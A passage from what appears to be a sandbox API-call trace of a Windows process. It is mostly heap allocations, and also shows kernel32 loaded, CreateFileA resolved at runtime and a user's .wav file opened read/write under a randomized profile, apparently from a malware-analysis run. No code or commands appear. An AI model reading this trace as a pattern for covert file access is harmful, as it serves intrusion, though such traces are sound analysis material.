(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.049] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0182.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd330 [0182.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd330, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0182.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.050] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0182.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0182.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0182.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd330, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0182.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.050] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0182.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0182.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0182.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0182.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0182.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0182.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0182.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x54) returned 0x8c4a48 [0182.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav", cchWideChar=84, lpMultiByteStr=0x8c4a48, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav", lpUsedDefaultChar=0x0) returned 84 [0182.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0182.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0182.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0182.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.052] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\r64i-tkxh1f.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0182.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0182.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0182.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=84, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa8) returned 0x8fcbc0 [0182.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=84, lpWideCharStr=0x8fcbc0, cchWideChar=84 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav") returned 84 [0182.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0182.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0182.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fcbc0 | out: hHeap=0x8a0000) returned 1 [0182.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0182.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0182.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0182.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0182.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0182.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0182.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0182.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0182.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0182.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0182.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0182.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0182.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0182.055] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0182.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0182.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0182.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.056] RtlAllocateHeap 